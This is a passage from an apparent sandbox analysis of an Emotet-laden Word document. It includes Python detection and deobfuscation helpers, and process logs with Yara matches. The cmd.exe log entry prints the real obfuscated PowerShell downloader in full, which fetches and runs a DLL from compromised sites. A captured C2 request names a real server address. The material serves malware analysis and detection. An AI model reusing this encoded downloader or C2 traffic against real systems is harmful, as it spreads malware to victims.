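    segments = [s for s in path.split("/") if s]
    generated = [s for s in segments if looks_generated(s)]
    if len(generated) >= 3 and len(generated) >= len(segments) - 1:
        reasons.append(f"{len(generated)}/{len(segments)} path segments look generated")
    return len(reasons) >= threshold, reasons


# Request head copied from the capture in this report.
EMOTET_POST = """POST /qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/ HTTP/1.1
DNT: 0
Referer: 195.159.28.230/qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/
Content-Type: multipart/form-data; boundary=---------------------iENsjsNk0B6FOMTAZLRMt
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 195.159.28.230:8080
Content-Length: 5492
Connection: Keep-Alive
Cache-Control: no-cache
"""

# Constructed controls: a normal browser upload, and an internal API call on an IP:port.
BENIGN_POST = """POST /api/upload HTTP/1.1
Host: files.example.com
Referer: https://files.example.com/upload
Content-Type: multipart/form-data; boundary=abc123
User-Agent: Mozilla/5.0
Content-Length: 42
"""

INTERNAL_POST = """POST /api/v1/jobs HTTP/1.1
Host: 10.0.0.5:8080
Content-Type: application/json
Content-Length: 2
"""

if __name__ == "__main__":
    for name, raw in (("emotet", EMOTET_POST), ("upload", BENIGN_POST), ("internal", INTERNAL_POST)):
        flagged, reasons = assess(raw)
        print(name, "FLAG" if flagged else "ok", reasons)
```

The threshold matters: the internal API call also hits "bare IP" and "port 8080", so a rule built on either of those alone would page on every service that listens on an alternate port, while the Emotet request scores on all five traits.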


                                                                    Code Manipulations

Statistics (interactive charts, not reproduced here): CPU Usage, Memory Usage, High Level Behavior Distribution, Behavior

                                                                    System Behavior

                                                                    General

                                                                    Start time:18:03:33
                                                                    Start date:24/01/2021
                                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                    Imagebase:0x13f480000
                                                                    File size:1424032 bytes
                                                                    MD5 hash:95C38D04597050285A18F66039EDB456
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:18:03:35
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAd
AAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACcAKwAnAGIAcwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuAGIAJwArACcAaQAnACsAJwBtACcAKwAnAGMAZQAnACsAJwBwACcAKwAnAHQAaQAnACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAHMASAB5ACcAKwAnADUAdAAvACcAKwAnACEAeAAgAFsAJwArACcAIAAnACsAJwBzACcAKwAnAGgAIABiADoALwAvAGEAcgBtAGEAawAnACkAKwAnAG8AbgAnACsAKAAnAGEAcgAnACsAJwBtAHMALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBpACcAKwAnAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACsAJwBzAC8AZgB6AC8AJwArACcAIQAnACkAKwAnAHgAIAAnACsAKAAnAFsAJwArACcAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8AJwArACcALwBhAGwAJwApACsAKAAnAHUAJwArACcAZwAnACsAJwByAGEAbQBhAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC4AJwApACsAJwBtACcAKwAnAHgAJwArACcALwAnACsAJwB0AC8AJwArACgAJwAyAC8AIQB4ACcAKwAnACAAJwArACcAWwAgAHMAaAAnACkAKwAoACcAIABiACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBoAG8AJwApACsAJwBtAGUAJwArACgAJwBjAGEAcwBzAC4AYwBvACcAK
wAnAG0ALwAnACsAJwB3AHAAJwApACsAKAAnAC0AYwAnACsAJwBvAG4AdAAnACkAKwAoACcAZQBuAHQAJwArACcALwBpAEYAJwArACcALwAnACkAKQAuACIAUgBlAGAAUABsAGAAQQBDAGUAIgAoACgAJwB4ACAAJwArACgAJwBbACAAcwBoACcAKwAnACAAJwApACsAJwBiACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQATwAzADMAOABfADcANwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAHAAYABsAEkAdAAiACgAJABPADUAMwBVACAAKwAgACQASgByAG4AegBtAGsAcwAgACsAIAAkAFUAXwAyAEQAKQA7ACQAUQA5ADkAUAA9ACgAJwBGADgAJwArACcAOABTACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATQB6AHUAYwBoAGoANgAgAGkAbgAgACQAWABhAHAAMQBsAG0AYQApAHsAdAByAHkAewAoAC4AKAAnAE4AJwArACcAZQB3AC0ATwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAAcwB5AFMAVABlAE0ALgBuAGUAdAAuAFcARQBCAGMAbABpAGUATgB0ACkALgAiAGQATwBXAGAATgBMAE8AYQBEAGYAYABpAGAATABFACIAKAAkAE0AegB1AGMAaABqADYALAAgACQAWABkAG4ANQB4AGgAZwApADsAJABDADUANwBCAD0AKAAnAEMAMgAnACsAJwA5AEMAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAFgAZABuADUAeABoAGcAKQAuACIAbABlAE4AYABHAGAAVABoACIAIAAtAGcAZQAgADQANwA2ADYAOQApACAAewAuACgAJwByAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABYAGQAbgA1AHgAaABnACwAKAAoACcAQQBuACcAKwAnAHkAUwB0ACcAKQArACcAcgAnACsAKAAnAGkAbgAnACsAJwBnACcAKQApAC4AIgB0AE8AUwBgAFQAcgBJAGAATgBHACIAKAApADsAJABNADMAOQBTAD0AKAAnAFEAJwArACgAJwA3ACcAKwAnADYATgAnACkAKQA7AGIAcgBlAGEAawA7ACQAWAA1ADEAWAA9ACgAJwBLADEAJwArACcANgBGACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwA0AF8ARgA9ACgAJwBWADIAJwArACcAMQBYACcAKQA=
                                                                    Imagebase:0x4a850000
                                                                    File size:345088 bytes
                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
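The cmd.exe command line above hides its intent twice: cmd caret escapes (m^s^g, p^owe^rs^he^ll^), which cmd strips before the words mean anything, and a PowerShell -enc blob, which is base64 over UTF-16LE rather than UTF-8. Decoding the blob by hand shows the usual Emotet construction: every string is assembled from concatenated fragments, method names are split with backticks ("Re`Pl`ACe", "Sp`lIt"), the URL list carries a placeholder where http belongs that is restored with .Replace(), the list is .Split() on a separator built from variables, and each URL is tried with DownloadFile until the file written to the H64C.dll path (the one rundll32 later loads with the argument AnyString, as the process list below shows) passes a minimum-size check. The Python below is an added analysis helper, not part of the report or of the sandbox: it peels both layers and recovers the URL list. The encoded script it runs against is a constructed, shortened sample in the same shape with placeholder hosts (example.test, example.org), not the report's payload; the string folding is a regex heuristic rather than a PowerShell parser, and it does not evaluate the .Split() argument.

```python
import base64
import re

# ---- cmd.exe layer ---------------------------------------------------------

def uncaret(cmdline):
    """Undo cmd.exe caret escaping: '^' quotes the next character (m^s^g -> msg)."""
    return re.sub(r"\^(.)", r"\1", cmdline)

# -EncodedCommand and the abbreviations PowerShell accepts for it (-e, -ec, -en, -enc).
ENC_ARG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

def extract_encoded(cmdline):
    m = ENC_ARG.search(cmdline)
    return m.group(1) if m else None

def decode_encoded(b64):
    """-enc payloads are base64 over UTF-16LE, not UTF-8."""
    return base64.b64decode(b64).decode("utf-16-le")

def encode_script(script):
    """Inverse of decode_encoded; used here only to build the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# ---- PowerShell layer: undo the string-building tricks ---------------------

CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")        # 'ab'+'cd'  -> 'abcd'
PAREN = re.compile(r"(?<![\w\"\]])\(\s*'([^']*)'\s*\)")    # ('ab')     -> 'ab', but not f('ab')
DQ = re.compile(r'"([^"]*)"')                              # "Re`Pl`ACe" -> "RePlACe"

def strip_backticks(script):
    # PowerShell ignores a backtick before a character that is not one of its escape
    # letters (lowercase 0 a b e f n r t u v), so the split method names can be rejoined.
    return DQ.sub(lambda m: '"' + re.sub(r"`(?=[^0abefnrtuv$`])", "", m.group(1)) + '"', script)

def fold_strings(script):
    """Merge adjacent literals until nothing changes (heuristic, not a PowerShell parser)."""
    prev = None
    while prev != script:
        prev = script
        script = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        script = PAREN.sub(lambda m: "'" + m.group(1) + "'", script)
    return script

# 'blob'.Replace('token', 'http' | $var): the URL list with its scheme placeholder.
PIPELINE = re.compile(
    r"'([^']*)'\s*\.\s*\"?replace\"?\s*\(\s*'([^']*)'\s*,\s*(?:'([^']*)'|\$(\w+))\s*\)",
    re.IGNORECASE,
)

def resolve_literal(script, name):
    """Value of $name when the (folded) script assigns it a plain string literal."""
    m = re.search(r"\$" + re.escape(name) + r"\s*=\s*'([^']*)'\s*;", script)
    return m.group(1) if m else None

def extract_urls(folded):
    urls = []
    for m in PIPELINE.finditer(folded):
        blob, token, lit, var = m.groups()
        repl = lit if lit is not None else resolve_literal(folded, var)
        if repl is None:
            continue
        # The separator is built from variables in the real sample, so instead of evaluating
        # the .Split() argument we cut at every scheme and drop trailing separator characters.
        for piece in re.split(r"(?=https?://)", blob.replace(token, repl), flags=re.IGNORECASE):
            piece = re.sub(r"[^A-Za-z0-9/._~%?=&-]+$", "", piece)
            if re.match(r"https?://", piece, re.IGNORECASE):
                urls.append(piece)
    return urls

def analyse(cmdline):
    plain = uncaret(cmdline)
    b64 = extract_encoded(plain)
    script = decode_encoded(b64) if b64 else ""
    folded = fold_strings(strip_backticks(script))
    size = re.search(r"-ge\s+(\d+)", folded)
    return {
        "cmdline": plain,
        "script": script,
        "folded": folded,
        "urls": extract_urls(folded),
        "min_size": int(size.group(1)) if size else None,
    }

# ---- constructed sample (not the report's payload) -------------------------
# Same construction as the report's script, shortened, with placeholder hosts.
SAMPLE_SCRIPT = (
    "$o='h' + 'tt'+'p';"
    "$Xd=$HOME+'\\Snuvw2w\\V4651pz\\H64C.dll';"
    "$Xa=('x'+' '+('['+' sh b:'+'//')+('exam'+'ple')+'.test'+('/wp-'+'admin/A1/')+'!'"
    "+'x'+' ['+' '+'sh'+(' b'+'s://'+'exam')+'ple.org'+('/js/'+'B2/'))"
    ".\"Re`Pl`ACe\"(('x '+('[ sh'+' ')+'b'),$o).\"Sp`lIt\"('!');"
    "foreach ($m in $Xa){try{(New-Object Net.WebClient).\"dOW`NLOaDf`i`LE\"($m,$Xd);"
    "if((Get-Item $Xd).\"leN`G`Th\" -ge 47669){rundll32 $Xd,'AnyString';break}}catch{}}"
)
SAMPLE_CMDLINE = (
    "cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. "
    "& p^owe^rs^he^ll^ -w hi^dd^en -^e^nc " + encode_script(SAMPLE_SCRIPT)
)

if __name__ == "__main__":
    result = analyse(SAMPLE_CMDLINE)
    print(result["folded"])
    print(result["urls"], result["min_size"])
```

Run against a real sample, the folded script is what you read: one literal per URL list, one literal per method name, and the download loop's size threshold in clear. The folding stops at the constructs it does not model (format-string [Type] lookups, array indexing), so check the output by eye before treating the URL list as complete.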

                                                                    General

                                                                    Start time:18:03:36
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\System32\msg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:msg user /v Word experienced an error trying to open the file.
                                                                    Imagebase:0xff320000
                                                                    File size:26112 bytes
                                                                    MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:18:03:36
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
Commandline:powershell -w hidden -enc (encoded command omitted here; it is the same blob passed on the cmd.exe command line above)
                                                                    Imagebase:0x13fb40000
                                                                    File size:473600 bytes
                                                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:high

                                                                    General

                                                                    Start time:18:03:43
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
                                                                    Imagebase:0xff780000
                                                                    File size:45568 bytes
                                                                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:18:03:44
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2107659481.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2107638490.0000000000160000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2108176213.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:18:03:48
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2115709278.0000000000250000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2119181462.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2115685260.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:18:03:54
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',FkNpAoTRbYmZ
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2125452150.0000000000690000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2125404655.0000000000250000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2126211663.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:18:03:58
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Psyzc\rrjb.eew',#1
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2138353893.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2135403936.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2135436680.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:18:04:03
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',MapzU
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2149603848.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2147996106.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2148213455.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:18:04:08
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo',#1
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2158799762.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2157690183.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2157667927.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:18:04:13
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',mIFAsDzIotZuZ
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2166530116.0000000000240000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2166511135.0000000000160000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2167094683.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:18:04:17
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx',#1
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2176671171.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2176658564.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2180490151.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:18:04:22
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',iaFY
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2188345600.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2187673787.0000000000150000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2187719578.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:18:04:27
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu',#1
                                                                    Imagebase:0xb40000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
